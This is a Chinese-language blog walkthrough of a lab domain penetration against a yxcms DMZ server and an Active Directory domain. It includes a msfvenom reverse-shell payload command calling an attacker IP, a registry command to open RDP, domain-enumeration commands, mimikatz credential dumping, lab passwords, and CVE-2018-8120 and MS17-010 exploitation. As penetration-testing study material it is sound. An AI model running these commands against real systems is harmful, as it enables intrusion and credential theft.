內網滲透 | 記錄一次簡單的域滲透

  • 2020 年 2 月 19 日
  • 筆記

環境搭建

三台虛擬機,拓撲如下:

看一下網路配置。

VM1雙網卡,第一個橋接一個VMnet2,橋接的作用是模擬將其web服務暴露在外網。攻擊機是在橋接網卡的網路中。

VM2、VM3全部是VMnet2,測試後是可以的。

後面碰到一個問題,DMZ無法與域控通訊,相當於整個域與DMZ失去了聯繫,後面發現要將DMZ的DNS設置成域控AD的IP。


初探DMZ

可以看到有個yxcms。

後台

存在弱口令:admin 123456

可以看到一些系統的設置,站點物理路徑:C:/phpStudy/WWW

先瀏覽一下後台,看看有沒有能get shell的地方。

看到了執行sql語句,但是在嘗試寫shell的過程中發現一句話寫不進去。

任意文件寫入

http://192.168.8.157/yxcms/index.php?r=admin/set/tpadd&Mname=default

目標路徑:

http://192.168.8.157/yxcms/protected/apps/default/view/default/config_inc.php

get shell


進入內網

關於發現內網主機以及代理的問題,在「淺析內網滲透」一文中有解釋:

這裡不再贅述,只是演示相關操作。

ipconfig

雙網卡,可知內網ip段時192.168.52.x,進行域滲透最好連接3389。

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

用上述命令開啟3389埠。

3389 open

add user

注意估計是有密碼策略,複雜度夠了才能添加成功。

但是3389連接不上,估計是開了防火牆……

可以選擇msf的shell關閉防火牆,或者是使用ngrok隧道連接3389。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.116 lport=2333 -f exe > get.exe    meterpreter > run post/windows/manage/enable_rdp

connect 3389

域滲透常用的命令:

ipconfig /all    查詢本機IP段,所在域等  net config Workstation    當前電腦名,全名,用戶名,系統版本,工作站域,登陸域  net user    本機用戶列表  net localhroup administrators    本機管理員[通常含有域用戶]  net user /domain    查詢域用戶  net user 用戶名 /domain    獲取指定用戶的賬戶資訊  net user /domain b404 pass    修改域內用戶密碼,需要管理員許可權  net group /domain    查詢域裡面的工作組  net group 組名 /domain    查詢域中的某工作組  net group "domain admins" /domain    查詢域管理員列表  net group "domain controllers" /domain    查看域控制器(如果有多台)  net time /domain    判斷主域,主域伺服器都做時間伺服器

簡單收集資訊後得到:域:god.org 域控:138 域成員:141

可以使用msf的getsystem提權成功  抓hash:hashdump  內網滲透 | 手把手教你如何進行內網滲透

或者參考上篇內網滲透msf mimikatz抓取明文。

mimikatz

內網訪問還是兩個方法:socks代理以及msf添加路由。


內網漫遊

這裡還是選擇了socks代理。

proxychains msfconsole

445也開著,嘗試打一波17_010,2003總是藍屏遂放棄……

這樣已經拿到了另一台域成員的許可權了。

proxychains rdesktop 192.168.52.141

傳個shell:

rdesktop -f 192.168.52.141 -u Railgun -p MIE123@u123 -r disk:E=/root/Desktop/

運行即可。

通過getsystem提權成功。接下來域控。

通過上面mimikatz的使用我們已經知道了域用戶的帳號密碼:Administrator

登陸:GODAdministrator hongri@u123

提權+hash:

CVE-2018-8120

這樣等域控管理員登陸就可以得到域控的密碼了。

這樣登陸的全被記錄了下來。

寫在最後

進行域滲透的最終目標就是拿到域控導出hash或明文密碼。

拿到DMZ業務段機器後,開個socks並且反彈個meterpreter的shell回來

  • proxychians來msf或nmap
  • Windows proxifier來滲透內網web
  • meterpreter添加路由

然後就是域成員及域控的滲透,本文沒有涉及$IPC入侵,不過應該也挺常用的。

涉及的比較重要的是如何開3389,如何關閉防火牆,如何得到域控的密碼以及17_010無法反彈shell時怎麼辦。

拿到域控後提權導密碼,結束。